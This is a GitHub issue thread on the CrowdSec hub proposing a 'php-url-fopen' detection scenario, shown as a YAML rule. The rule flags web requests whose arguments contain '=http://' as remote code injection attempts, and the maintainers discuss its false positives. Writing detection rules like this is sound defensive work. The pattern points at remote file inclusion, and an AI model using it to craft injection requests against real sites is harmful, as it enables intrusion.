hub icon indicating copy to clipboard operation
hub copied to clipboard
verified publisher icon crowdsecurity

php-url-fopen

Open LtSich opened this issue 5 years ago • 3 comments

Based on the fail2ban filter I have make this one for crowdsec. Work fine. This will detect request with http_args containing =http:// who is generally used to inject code on website.

type: leaky
name: si/php-url-fopen
description: "detect php url fopen"
debug: false
# request with http://
filter: "evt.Meta.log_type == 'http_access-log' && evt.Parsed.http_args contains '=http://'"
groupby: evt.Meta.source_ip
capacity: 3
leakspeed: "600s"
blackhole: 5m
labels:
 service: http
 type: scan
 remediation: true

LtSich avatar Jan 28 '21 14:01 LtSich

Hello,

I think this one is a bit too aggressive and might lead to false positives :(

buixor avatar Feb 09 '21 18:02 buixor

This is not a scenario that you can deploy everywhere. You have to know how your websites are working. I have 2 servers where I can't use this one because this generate false positive. But on all other it's fine, this block a lot of bots trying to inject remote code on websites.

This scenario need a big warning before installing it :)

LtSich avatar Feb 18 '21 13:02 LtSich

yes, I guess we can add it to a collection that is not installed by default, so I keep it open for the right time ;)

buixor avatar Feb 18 '21 13:02 buixor